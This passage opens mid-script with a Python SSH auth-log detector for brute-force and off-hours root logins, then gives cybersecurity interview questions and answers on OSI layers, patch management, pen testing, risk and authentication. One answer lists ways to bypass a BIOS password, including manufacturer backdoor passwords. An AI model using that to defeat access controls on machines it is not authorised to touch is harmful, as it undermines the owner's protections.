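Mar 10 02:11:20 web1 sshd[2215]: pam_unix(sshd:session): session opened for user root
Mar 10 09:30:00 web1 sshd[3001]: Accepted publickey for deploy from 198.51.100.5 port 40001 ssh2
Mar 10 09:31:11 web1 sshd[3003]: Failed password for deploy from 198.51.100.5 port 40002 ssh2
"""

LINE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<ip>[\d.]+)"
)


def parse_auth_log(text, year=2024):
    """Syslog lines carry no year, so one is assumed for the timestamps."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                                    # not a login event
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def find_iocs(events, max_failures=5, window_s=60, privileged=("root",), work_hours=(8, 18)):
    """Rules over login events:
    - brute_force: max_failures failed logins from one IP inside window_s seconds
    - success_after_failures: a success within window_s of a failure burst (log-in red flag)
    - off_hours_privileged_login: a privileged account logging in outside work_hours"""
    alerts = []
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    for ip, evs in by_ip.items():
        fails = []                                      # sliding window of failure timestamps
        for ts, result, user, _ in sorted(evs):
            if result == "Failed":
                fails = [t for t in fails if (ts - t).total_seconds() <= window_s] + [ts]
                if len(fails) == max_failures:          # fire once when the threshold is crossed
                    alerts.append(("brute_force", ip, user, ts))
                continue
            if fails and (ts - fails[-1]).total_seconds() <= window_s:
                alerts.append(("success_after_failures", ip, user, ts))
            if user in privileged and not (work_hours[0] <= ts.hour < work_hours[1]):
                alerts.append(("off_hours_privileged_login", ip, user, ts))
            fails = []
    return alerts


def alert_types(alerts):
    return sorted({a[0] for a in alerts})


if __name__ == "__main__":
    for alert in find_iocs(parse_auth_log(AUTH_LOG)):
        print(alert)
```

The sample produces three alerts, all for 203.0.113.7: the burst of failures, the success right after it, and a root login at 02:11. The deploy user's single daytime failure stays below every threshold, which is the point of keying the rules on rate and context rather than on any single event.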

What are the seven layers of the OSI model?

The OSI model describes communication between two endpoints on a network as seven layers, each providing services to the one above it:
- Physical layer (layer 1): transmits raw bits from one device to another over the medium; it defines how physical connections are set up and how bits are represented as electrical, optical or radio signals
- Data-link layer (layer 2): handles the flow of frames between directly connected nodes on a network segment (MAC addressing, switching) and detects errors caused by bit transmission errors
- Network layer (layer 3): routes packets between networks using logical addresses (IP addressing and routing)
- Transport layer (layer 4): provides end-to-end delivery across the network with error checking and flow control, and for TCP reliable ordered delivery (TCP, UDP)
- Session layer (layer 5): establishes, manages and terminates sessions between applications, including how long a system waits for the other side to respond
- Presentation layer (layer 6): manages the encryption, decryption, compression and formatting of data so that it arrives in the syntax the receiving application expects
- Application layer (layer 7): the interface through which users and programs communicate with the network to perform network-related operations (HTTP, SMTP, DNS)

what is the use of patch management?

The purpose of patch management is to keep the systems in a network updated and protected against malware and attacks that exploit known vulnerabilities. Many enterprise patch-management tools handle the process by installing agents on the target computers; the agents link the machines to a centralised patch server that distributes approved patches, tracks which machines have applied them and reports on those still missing.

What is the difference between vulnerability assessment and penetration testing?

Vulnerability assessment and penetration testing are different activities, but both serve the essential function of protecting the network environment.
Vulnerability assessment: a process, usually automated, to define, detect and prioritise the vulnerabilities in computer systems, network infrastructure, applications and so on, giving the organisation the information it needs to fix the flaws. It is broad and lists possible weaknesses; it does not confirm that they are exploitable.
Penetration testing: also called pen testing or ethical hacking, a process of actively testing a network, system or application, with permission, to find the vulnerabilities attackers could exploit and to demonstrate by exploiting them what an attacker could actually achieve. It is deeper and narrower than an assessment. In web application security it is often used to verify and tune a web application firewall (WAF).

How do you reset or remove the BIOS password?

There are several ways to reset or remove a BIOS password:
- Removing the CMOS battery for a few minutes so the stored settings are lost
- Using password-reset software
- Using commands from MS-DOS or a similar boot environment to clear the CMOS
- Setting the clear-CMOS jumper on the motherboard
- Using a manufacturer backdoor BIOS password
This is also why a BIOS password alone is weak protection against anyone with physical access; full-disk encryption is what actually protects the data on the machine.

What is the difference between a threat, vulnerability, and a risk?

Threat: someone or something with the potential to cause harm by damaging, destroying or stealing data from a system or organisation. Example: a phishing attack.
Vulnerability: a weakness in a system that makes a threat's outcome more likely or more damaging. Examples: SQL injection, cross-site scripting.
Risk: the combination of the probability that a threat exploits a vulnerability and the impact or loss if it does; in simple terms, the potential damage when a threat exploits a vulnerability.
Threat probability * Potential loss = Risk

What are the common methods of authentication for network security?

Token: a physical or software token used to access systems; because it generates long, unpredictable credentials, it is much harder for an attacker to get into the account than with a password alone
One-time password (OTP): a password valid for a single login or transaction, commonly used to verify identity when processing online transactions
Multi-factor authentication (MFA): a system that requires more than one independent method of authentication (something you know, have or are)
Out-of-band authentication: verification uses two different signals over two different channels or networks, for example a web login confirmed through a code sent to a phone; it blocks most account-takeover and identity-theft attacks in online banking because an attacker controlling one channel cannot see the other

